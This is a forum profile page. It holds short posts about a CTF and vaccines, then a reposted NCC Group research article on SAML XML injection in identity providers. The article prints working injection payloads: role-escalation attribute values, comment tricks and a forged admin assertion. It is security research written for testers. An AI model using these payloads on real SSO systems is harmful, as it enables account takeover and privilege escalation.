Nytro

Everything posted by Nytro

  1. The best write-ups will also be rewarded: 200 RON each.
  2. It has started, and it will end Sunday evening (23:59). GL & HF!
  3. How I love these sites, Antena3-style, that make claims without arguments, that is, without evidence. Examples: "x% of doctors got vaccinated" - where do these miserable sites get this information from? "Gheorghita declared..." - where did he declare it? Is there no video from TV or a press conference? A Facebook post, or anything else? News report by journalist Nytro: "Gigel the Drunkard, a well-known RST member, declared that he drank plum brandy to prevent Covid infection. The experiment had an unexpected ending: the SARS-CoV-2 virus got so drunk after infecting him that it decided to withdraw from Romania. Therefore, starting tomorrow, all restrictions will be lifted." My news story is just as plausible as the stories above.
  4. The CTF starts in less than 2 hours. PS: I have increased the prizes for places 4-10.
  5. Ready? If you have questions during the contest, we will discuss them on Slack: https://romaniansecurityteam.slack.com/
  6. I do not know of "mandatory vaccination" existing anywhere. It exists only for children, for minors (in certain countries, and it has been declared legal by the European Court), who cannot make decisions for themselves, and it is awful for their lives to depend on an adult who follows idiotic Facebook pages (e.g. Olivia Ster). I do not agree with mandatory vaccination for adults either. They can make their own decisions and take responsibility for them. Darwin.
  7. Vaccines do not have serious side effects, especially if we compare the number of blood clot cases against the number of clot cases caused by Covid-19. There was a statistic: 10 clot cases per 1,000,000 vaccinations versus 16,000 clot cases per 1,000,000 Covid infections. And around 1,500 clot cases per 1,000,000 smokers. Damn, I should quit. They have already been tested on over 140,000,000 people.
  8. Interesting, regarding vaccines and efficacy
  9. SAML XML Injection

Adam Roberts, March 29, 2021

The Single Sign-On (SSO) approach to authentication controls and identity management was quickly adopted by both organizations and large online services for its convenience and added security. The benefits are clear: for end-users, it is far easier to authenticate to a single service and gain access to all required applications, and for administrators, credentials and privileges can be controlled in a single location. However, this convenience presents new opportunities for attackers. A single vulnerability in the SSO authentication flow could be catastrophic, exposing data stored in all services used by an organization.

This blog post will describe a class of vulnerability detected in several SSO services assessed by NCC Group, specifically affecting Security Assertion Markup Language (SAML) implementations. The flaw could allow an attacker to modify SAML responses generated by an Identity Provider, and thereby gain unauthorized access to arbitrary user accounts, or to escalate privileges within an application.

What is SAML?

To begin, a brief overview of how the SAML authentication flow works has been provided below. Feel free to skip this section if you are already familiar with SAML and SSO in general.

SAML is a standard that allows authentication and authorization data to be securely exchanged between different contexts. It is commonly used in web applications to offer SSO capabilities, and can be easily integrated with Active Directory, making it a popular choice for applications used within enterprise environments. The authentication process relies on a trust relationship between two parties: the Identity Provider (which authenticates end-users), and the Service Provider (which is the application end-users want to access).
Under the most common authentication flow, when a user wants to access a service provider, they will be redirected to the identity provider with a SAML request message. The identity provider authenticates the user if they are not already logged in, and if this is successful, it redirects the user back to the service provider with a SAML response message (usually in the body of a POST request). The SAML response message will contain an assertion that identifies the user and describes a few conditions (the expiration time for the response and an audience restriction which states the service that the assertion is valid for). The service provider should validate the response, the assertion, and the conditions, and only provide the user with access to the application if the authentication was successful.

To prevent tampering, one or both of the SAML response and assertion should include a cryptographic signature that the service provider can verify. The use of a signature will ensure that a malicious user cannot simply modify the user identifier in the assertion, as the signature will no longer be valid. A more in-depth summary of SAML can be found on PingIdentity's website.

The Vulnerability

XML injection is a well-documented vulnerability class, which commonly affected older web applications utilizing XML or SOAP services in the backend. The common case involved user input being directly included in XML messages sent to the backend server. If the user input was not appropriately validated or encoded, an attacker could inject additional XML, and thereby modify request parameters or invoke additional functionality. While still relevant in some applications, XML injection is not nearly as common in 2021, with developers moving to adopt services built on newer data formats such as JSON, YAML, and Protocol Buffers.
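As a minimal sketch of this classic pattern (hypothetical function and element names, not code from any application discussed in this post), consider user input concatenated directly into a backend XML message:

```python
import xml.etree.ElementTree as ET

def build_backend_request(username: str) -> str:
    # Vulnerable: user input is concatenated into the XML message with
    # no encoding or validation.
    return f"<request><user>{username}</user><role>viewer</role></request>"

# A crafted username closes the <user> element and injects an extra
# <role> element, changing the structure of the message before it is
# parsed by the backend.
payload = "adam</user><role>administrator</role><user>x"
doc = ET.fromstring(build_backend_request(payload))
print([r.text for r in doc.findall("role")])  # ['administrator', 'viewer']
```

Which of the two role elements takes effect then depends entirely on how the backend selects repeated elements, a theme that recurs throughout the SAML scenarios below.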
In the context of a SAML identity provider, however, XML injection is a concern, as the SAML messages constructed during the authentication flow are XML-based, and contain data that is often sourced from untrusted locations. If this data is included within a SAML assertion or response message dangerously, it may be possible for an attacker to inject additional XML, and change the structure of the SAML message. Depending on the location of the injection and the configuration of the service provider, it may be possible to inject additional roles, modify the receiver of the assertion, or to inject an entirely new username in an attempt to compromise another user's account.

Crucially, it should be noted that the XML for SAML assertions and responses is always built before a cryptographic signature is applied. Therefore, the use of response signatures does not protect against this vulnerability.

This type of vulnerability is most commonly seen in SAML identity providers that naively use string templates to build the SAML XML messages. User-controlled data may be inserted into the template string using a templating language, regex match/replace, or simple concatenation. It is not exclusive to this scenario, however; even implementations which build the XML using appropriate libraries may fall victim to this vulnerability if the library is used incorrectly. During a number of security assessments of SAML identity providers, NCC Group has successfully leveraged XML injection vulnerabilities to modify signed assertions, and thereby gain unauthorized access to arbitrary user accounts.

Affected Fields

When constructing the SAML response and assertion, the identity provider is highly likely to include data that can be controlled by the user, either directly or indirectly.
Obvious examples include the SAML NameID, which uniquely identifies the user (this may be a numeric identifier, a username, or an email address), and additional attributes when they are requested by the service provider, such as the user's full name, phone number, or occupation. However, there are some less obvious fields that are, in most SAML implementations, sourced from the SAML request. A non-comprehensive list of fields in the SAML request that may be included in the SAML response/assertion has been provided below:

  • The ID of the SAML request is typically included in the InResponseTo attribute of the SAML response. (Note: in identity providers observed by NCC Group, almost all implementations included the SAML request ID in the SAML response. This field is therefore considered the most reliable for probing for XML injection vulnerabilities.)
  • The Issuer field, which identifies the issuer of the SAML request, may be included in the Audience field in the SAML assertion.
  • The IssueInstant, which states the time the SAML request was generated, may be included in the assertion conditions NotBefore attribute.
  • The Destination field, which states the endpoint that receives the SAML request. This field may also be used in the Audience element of the assertion.

Some implementations may even include data sourced from locations external to the basic SAML authentication flow. To provide an example, in one SAML identity provider, if a SAML request was received from an unauthenticated client, the server issued a redirect to the login page with a GET parameter that included the ID of the SAML request. When the user entered their credentials, the server used the GET parameter ID to look up the service provider associated with the SAML request, and then built the SAML response with this ID in the InResponseTo attribute. By modifying the ID GET parameter in the login request, it was possible to inject additional XML into the SAML response.
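To illustrate how such a reflection arises, here is a deliberately naive identity-provider sketch (a hypothetical string-template implementation of the kind described above, with made-up IDs) that substitutes the request ID into the response with no encoding:

```python
# Hypothetical template; real responses carry many more fields.
RESPONSE_TEMPLATE = (
    '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    'ID="{response_id}" InResponseTo="{request_id}"></samlp:Response>'
)

def build_response(request_id: str) -> str:
    # Vulnerable: the ID taken from the SAML request (already XML-decoded
    # by the parser) is substituted into the template with no encoding.
    # Any signature would be computed over the resulting string, so
    # signing does not prevent the injection.
    return RESPONSE_TEMPLATE.format(response_id="_abc123",
                                    request_id=request_id)

# The decoded form of a probing payload escapes the attribute and adds
# a canary attribute to the Response element:
out = build_response('_legit-request-id" ncctest="BBBB')
print('ncctest="BBBB"' in out)  # True
```

The same flaw applies to any of the request-derived fields listed above; the request ID is simply the most commonly reflected one.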
Identifying the Vulnerability

This vulnerability can be identified using common XML injection probing payloads. The following examples were recreated in a local environment, based on implementations observed during NCC Group security assessments.

First, to determine whether XML injection was possible, an intercepting proxy was used to modify the SAML request sent to the identity provider. The payload was inserted into the ID attribute of the request, and is designed to escape from the attribute value and inject an additional attribute (ncctest); note that the quotes in the payload are XML encoded. This is to ensure that the request XML is still valid; when the value is read by the identity provider, many implementations will XML-decode these entities:

<?xml version="1.0" encoding="UTF-8"?>
<samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" Destination="http://adam.local:8080/SSOService" ID="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA&quot; ncctest=&quot;BBBB" IssueInstant="2021-02-08T22:39:58Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/default-sp</saml:Issuer>
<samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>

When this was processed by the identity provider, the ID attribute was included directly within the SAML response template, in the InResponseTo attribute of the samlp:Response and saml:SubjectConfirmationData elements:

<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_fa828226-5b49-4d14-ac7c-fb64e2263f34" Version="2.0" IssueInstant="2021-02-08T23:46:14.988Z" Destination="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB">
<saml:SubjectConfirmationData NotOnOrAfter="2021-02-08T23:51:14.988Z" Recipient="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB"/>

If this test is successful, an attempt can be made to inject additional XML elements into the response. While being able to modify the attributes is interesting, it is not particularly useful; if additional XML can be injected, the attacker may be able to modify the SAML assertion, and ultimately gain unauthorized access to another user's account.

As a basic test, the following SAML request was used to inject an additional XML element (ncc-elem) into the response. As before, the quotes and angle brackets are XML encoded. Also note that the injected element includes another attribute – this is to ensure that the quotes in the template used by the identity provider are balanced, and that the response is valid XML:

<?xml version="1.0" encoding="UTF-8"?>
<samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" Destination="http://adam.local:8080/SSOService" ID="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA&quot; ncctest=&quot;BBBB&quot;&gt;&lt;ncc-elem attribute=&quot;aaaa" IssueInstant="2021-02-08T22:39:58Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/default-sp</saml:Issuer>
<samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>

This request produced the following XML in the SAML response:

<samlp:Response
Destination="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" ID="_6788c1c3-03a0-452f-80d5-b0296ec1a097" IssueInstant="2021-02-08T23:57:49.488Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB"> <ncc-elem attribute="aaaa"/> A similar process can be used for other injection points. If, for example, the identity provider includes the SAML request Issuer field within the Audience of the response, a payload such as the following could be used to inject additional elements. Note here that it is necessary to encode the angle brackets (&lt; and &gt;): <?xml version="1.0" encoding="UTF-8"?> <samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/generic-saml-localhost" Destination="http://127.0.0.1:8080/samlp" ID="_0699a57c1e6ac6afc3c2d7ab8cc56dec61cb09b672" IssueInstant="2021-02-11T18:51:31Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/generic-saml-localhost/&lt;ncc-test&gt;test&lt;/ncc-test&gt;</saml:Issuer> <samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/> </samlp:AuthnRequest> This request produced the following Audience element in the SAML assertion: <saml:AudienceRestriction> <saml:Audience>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/generic-saml-localhost/<ncc-test>test</ncc-test></saml:Audience> </saml:AudienceRestriction> For user attributes, the success of injecting XML characters into the SAML assertion will depend on how these attributes are updated and stored by the identity provider; if XSS defenses prevent users from storing characters such as angle brackets in 
their attributes, it may not be possible to perform the attack. In the following example, setting the user’s name to “Adam</saml:AttributeValue><ncc-test>aaaa</ncc-test><saml:AttributeValue>” produced the following Attribute element in the assertion. In this particular case, it was necessary to close the saml:AttributeValue element and create a new AttributeValue element to pass XML validation performed by the server: <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">Adam</saml:AttributeValue> <ncc-test>aaaa</ncc-test> <saml:AttributeValue/> </saml:Attribute> Exploiting the Vulnerability Identifying SAML XML injection vulnerabilities is fairly straightforward, but exploiting them is another story. Success will depend on a multitude of factors, including where the injection points occur, how tolerant of invalid XML the libraries used to sign and parse the SAML response are, and whether the service provider will trust the injected payload. In fact, in some cases where XML injection was possible on the identity provider, a number of service providers rejected or ignored the modified payload. Not because the signature was invalid, but because of repetition in the document. The nature of this vulnerability will mean that, in many cases, it is necessary to inject repeated elements or to construct entirely new assertions. Problems encountered as a consequence of this include: The service provider may select the original legitimate element (assertion or NameID) created by the identity provider, rather than the injected element. Many XML libraries will behave differently when selecting an element that is repeated in a document; typically, this will either be the first occurrence or the last occurrence. 
Some security conscious service providers may reject responses containing repeated elements altogether; there is generally no good reason for an assertion to contain two NameID elements, for example.

The attack may also fail if the service provider includes defenses against XML Signature Wrapping (XSW)*. This is a well-documented SAML vulnerability, where an attacker modifies the structure of a SAML response in an attempt to trick the service provider into reading the user's identity from an unsigned element (e.g. by adding a second unsigned assertion to a SAML response, before the legitimate signed assertion). Although an XML injection attack would mean that both assertions are included in the scope of the SAML response signature, simply the presence of a second assertion element can be enough for some service providers to reject the message.

* For a good overview of XML Signature Wrapping attacks, see On Breaking SAML: Be Whoever You Want to Be

Example Exploits

In assessments performed by NCC Group, this vulnerability was most commonly exploitable in two scenarios:

  • Attribute injections – where the injection occurs in a SAML attribute associated with the account in the Identity Provider.
  • InResponseTo injections – where the injection affects the "InResponseTo" attribute of the SAML response.

Example exploits for these two scenarios have been provided in the following section. As it would be impossible to demonstrate all possible XML injection attacks on SAML implementations in this blog post, hopefully these can provide some inspiration. The techniques outlined here can likely be adapted to exploit identity providers affected by this vulnerability in most configurations.

Disclaimer: These examples were reproduced in a local environment specifically built to be vulnerable to this attack.
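The probing step described above can be scripted. A small sketch (the helper name and marker are made up for illustration) that produces the XML-encoded attribute-escape payload for the request's ID attribute, using Python's standard library:

```python
from xml.sax.saxutils import escape

def attribute_probe(request_id: str, marker: str = "ncctest") -> str:
    # Once the identity provider XML-decodes this value, the quote
    # closes the original attribute and marker="BBBB" is injected
    # alongside it.
    raw = f'{request_id}AAAA" {marker}="BBBB'
    # Encode the quotes so the outgoing AuthnRequest remains valid XML.
    return escape(raw, {'"': "&quot;"})

probe = attribute_probe("_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfff")
print(probe)
# _3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA&quot; ncctest=&quot;BBBB
```

If the SAML response comes back containing ncctest="BBBB", the request ID is being reflected without encoding and the deeper element-injection tests are worth attempting.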
Attribute Injections

In addition to the NameID (which is the unique identifier for the user), SAML responses can include a set of user attributes that may be useful to the service provider. These are optional and there are no particular requirements; typically they are used to send data such as the user's name, email address, and phone number. Some service providers also use the attributes to dictate the privileges that should be assigned to the user post-authentication, using a role attribute or similar. Therefore, if these attributes are not appropriately encoded, an attacker could inject or modify attributes to escalate their privileges or otherwise gain access to sensitive data in the service provider.

As an example, suppose the SAML assertion contains an AttributeStatement such as the following, which includes two attributes: one for the user's full name and another for the user's role (viewer):

<saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>

The attacker could change their name in the identity provider to the following value:

Adam Roberts</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">administrator

If the identity provider includes this value in the name attribute without appropriate validation, the following AttributeStatement will be sent to the service provider.
This may allow the attacker to authenticate to the application under the context of an “administrator”, rather than a “viewer”: <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">administrator</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> Note that the “role” Attribute element is repeated, and it is therefore possible that the attack may fail if the service provider reads the second role attribute value, or if a validator rejects the assertion. If the attacker controls two attributes (e.g. the name and an email address), it may be possible to use XML comments to effectively delete the role attribute generated by the identity provider. Take the following AttributeStatement as an example. 
This includes the user’s email address, the role, and a name attribute: <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">user@example.com</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> The role attribute is included between the email and name attributes. An attacker could set their email address and name to the following values: email: user@example.com</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">administrator</saml:AttributeValue></saml:Attribute><!-- name: --><saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">Adam Roberts When the AttributeStatement element is built by the identity provider, the following XML will be produced, where the “viewer” role attribute is enclosed within an XML comment: <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">user@example.com</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"> <saml:AttributeValue xsi:type="xs:string">administrator</saml:AttributeValue> 
</saml:Attribute>
<!--</saml:AttributeValue></saml:Attribute><saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">viewer</saml:AttributeValue></saml:Attribute><saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">-->
<saml:Attribute Name="name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
<saml:AttributeValue xsi:type="xs:string">Adam Roberts</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>

When parsed by the service provider, the user will be authenticated to the application under the context of an administrator.

Comments can be a useful tool when exploiting XML injections in SAML messages. When done correctly, it is often possible to control large parts of the SAML response or assertion, meaning it can be particularly effective in subverting restrictions imposed by strict service providers. It is worth noting that most XML signature schemes used by SAML implementations canonicalize XML documents prior to calculating a signature, and as part of this process comments are removed from the document. In other words, comments in a SAML response are not considered when the signature is calculated, and can therefore be removed entirely before submission to the service provider. If it is possible to inject XML into two locations within a SAML response, the opportunities for exploitation are much greater through the use of XML comments.

InResponseTo and Assertion Injections

Injections which affect the InResponseTo attribute occur when the SAML request ID is included dangerously within the response. As mentioned previously, the vast majority of SAML identity providers reflect the value of the SAML request ID in the response, and this is therefore considered a very reliable attribute to probe for injections. Exploiting this type of injection, however, can be extremely difficult.
The primary reason is that the value is included in the SAML response in two locations; the first is within the InResponseTo attribute of the Response element, and the second is within the InResponseTo attribute of the SubjectConfirmationData element, in the assertion.

Below is an example of a SAML response generated by an identity provider (hosted on a local server) affected by this vulnerability. The InResponseTo attribute contains the value "_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46", which was set by the service provider in the SAML request:

<?xml version="1.0" encoding="UTF-8"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_bb9456e6-ffbe-4117-94ca-1800923389b4" Version="2.0" IssueInstant="2021-02-12T00:18:22.727Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#_bb9456e6-ffbe-4117-94ca-1800923389b4">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>gj6oIvcJnXaTBtVRwyNVGaIwwEaCuO0jZizyG/Z94aU=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>ueEVB+Xt+kiZZ/g8+9LpO6IWevTatj0NnYLYUwcluqEGlYWMyXef5uQpWf89BO/j294jnIA9KifnqwvhZZr5Ma5e1UQ5/C5d3lTkSA8MTi3DZ8AuHmEtvnC83ivD9IJizcyr0KbwcHtJVzisvvYDwo/f5xq3IrFtqA18tL/mMVA=</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>MIICsDCCAhmgAwIBAgIUdbiKONoAtbg996PB63hRqTx/r3kwDQYJKoZIhvcNAQELBQAwajELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkNBMRIwEAYDVQQHDAlTdW5ueXZhbGUxEjAQBgNVBAoMCU5DQyBHcm91cDESMBAGA1UECwwJU0FNTCBUZXN0MRIwEAYDVQQDDAlsb2NhbGhvc3QwHhcNMjEwMjA4MTgwNTM1WhcNMjIwMjA4MTgwNTM1WjBqMQswCQYDVQQGEwJVUzELMAkGA1UECAwCQ0ExEjAQBgNVBAcMCVN1bm55dmFsZTESMBAGA1UECgwJTkNDIEdyb3VwMRIwEAYDVQQLDAlTQU1MIFRlc3QxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAzcBpN/M96rsY/eVadDGiWsxPtfh2gjx8MXbxitVeCn9/hxp5cMiNY3RLWP6G1unn/jmY5xgs2IOXnWnLCgOTztJ7xY7e55El3GUB2F+f92BsmymNbkmmjW3TS61R7DOmU5Z2c2kigxahhoV2CuZAP4qiJpWI77jK8MU2hnKyBaMCAwEAAaNTMFEwHQYDVR0OBBYEFG4sdyzqVsCQHO8YaigkbVmQE9RdMB8GA1UdIwQYMBaAFG4sdyzqVsCQHO8YaigkbVmQE9RdMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADgYEANF254aZkRGRTtjMLa7/8E6aFhtYCUU86YtRrrBFhslsooPMvwKnKelCdsE5Hp6V50WK2aTVBVI/biZGKCyUDRGZ0d5/dhsMl9SyN87CLwnSpkjcHC/b+I/nc3lrgoUSLPnjq8JUeCG2jkC54eWXMa6Ls2uFTEbUoI+BwJHFAH08=</ds:X509Certificate> </ds:X509Data> </ds:KeyInfo> </ds:Signature> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_fa80f7dc-12d1-490c-b19f-c99773167f4b" Version="2.0" IssueInstant="2021-02-12T00:18:22.727Z"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">user@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2021-02-12T00:23:22.727Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-12T00:18:22.727Z" NotOnOrAfter="2021-02-12T00:23:22.727Z"> 
<saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-12T00:18:22.727Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> </samlp:Response> The goal for most attackers here would be to inject a new assertion that includes a different NameID, and thereby gain access to another user’s account on the service provider. The following payload (decoded and formatted for readability), when included in the ID of the SAML request sent to the identity provider, achieves this. _6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z"> 
<saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> <elem test=" There are a few elements to this payload, explained below. First, the "> sequence is used to escape from the InResponseTo attribute and into the XML context. The injected XML then includes copies of the Issuer and Status elements observed in other responses from the identity provider. Next, an entirely new assertion is created, with a NameID that specifies the email address "admin@example.org". This assertion was built from assertions taken from legitimate responses generated by the server; the NameID field was modified, along with the NotOnOrAfter attributes (to specify a time in the future) and the InResponseTo attribute (to include the ID of the SAML request). Replacing these values ensures that the service provider will not reject the assertion: it expects an assertion that is not expired and that was generated for the SAML request it previously issued. Finally, an unrelated element, "elem", is opened at the end with an attribute. This is designed to fix the dangling markup left by the Response and SubjectConfirmationData elements created by the identity provider, where the injection points occur. Note, however, that this step is optional, and its necessity will depend on how tolerant the XML parser is. Some parsers will reject the XML document if the dangling markup is not part of an element, while others will simply treat it as an additional text node. If the server rejects the payload without this element, try including it in another SAML request.
